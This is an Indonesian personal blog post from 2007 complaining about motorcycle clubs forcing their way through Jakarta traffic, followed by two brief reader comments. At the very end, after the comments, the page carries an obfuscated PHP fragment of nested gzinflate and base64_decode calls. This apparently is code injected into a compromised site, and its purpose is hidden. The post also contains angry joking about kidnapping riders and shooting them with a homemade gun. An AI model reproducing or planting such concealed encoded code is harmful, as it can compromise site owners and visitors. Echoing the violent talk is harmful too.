Delicious

Archives

Categories

Bangsadh!!!

  ozzie / 10/08/2007


10/08/07 – Pulang Kerja
Bismillahirohmanirohim [-o<

Sebelumnya Mohon maaf kalo ada kelompok/institusi/organisasi/pihak” yang merasa tersinggung 8-}8-}.. mungkin bisa jadi bahan Renungan?? :-<:-<

Prihatin.. Kecewa.. Kesel. #:-s#:-s disaat pulang kerja, dengan kondisi jalan di kawasan jakarta yang padat oleh antrian kendaraan.. ada pihak-pihak yang menamakan dirinya klub/komunitas yang melintasi antrian kemacetan dengan gaya ‘Jagoan‘ main nyerobot, nyeruduk” (Untung gak Nyangkut tuh Gerobak di belakang):)).. memotong.. menghadang perempatan jalan demi rombongan (baca: komunitas) mereka lewat. :-w:-w.. yang bisa dibilang sangat mengganggu, meresahkan, mengganggu konsentrasi dan mengancam keselamatan para pengguna jalan yang lain.. :-? :-? hmmm…. Punya Otak gak sih om?#-o Mungkin rame-rame kali yak? 8-}.. tau dah kalo pada jalan sendirian :-??:-?? 8-}8-}.. udah pada bisa nebak kan??\:d/\:d/ bagooosss<:-p ..

Culik ajah;))Siapa yang kuat, dia yang menang ‘ hukum jalanan berlaku \:d/\:d/.. next time bawa pistol rakitan ajah:D.. macem-macem tinggal Tembak ditempat.. lalu tinggal? :> <:-p

Sorry yak om? :)>-:)>-. denger” katanya disetiap club motor punya tehnik tentang Safety Riding?? :-/ kok gak di pake sih om?? #-o#-o TOLOL amat sih 8-}8-}… ngapin ikut2 begituan kalo gak dipake??.. pen dibilang gagah? :> jantan?:-& keren?8-} gaya?:> gaol? 8-} ..

Pake maenin lampu sen, sirene, knalpot segala #-o.. Giliran dikejar 8-} ehhh… malah merapat kebarisannya 8-}8-}.. capeeee deeeee8-}8-} .. kalo mo nge-Test boleh lah;;);;);;)… percumalah om motor keren” kalo Jockey – nya manja, penakut dan bawanya GAGAP..8-}8-}.. takut lecet kali =))

Moga” ane bisa lebih sabar[-o<[-o< … dan alhamdulillah belon pernah Matiin (Nyawa) Orang dijalan.. 8-}8-}

:)>-:)>-
salam damai dari pengguna jalan yang masih pake standar dari pabrik.. 8-}


« »


2 Responses to “Bangsadh!!!”

  1. DOMBA Says:

    halo,, pak Standard Pabrik yang Asoyyy,, kmana ajahhh sih,, nggak ada kabarnya lg,,, :(

  2. ozzie Says:

    Oit:D.. sorry om.. gi sibuk ANU :)>-:)>-


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>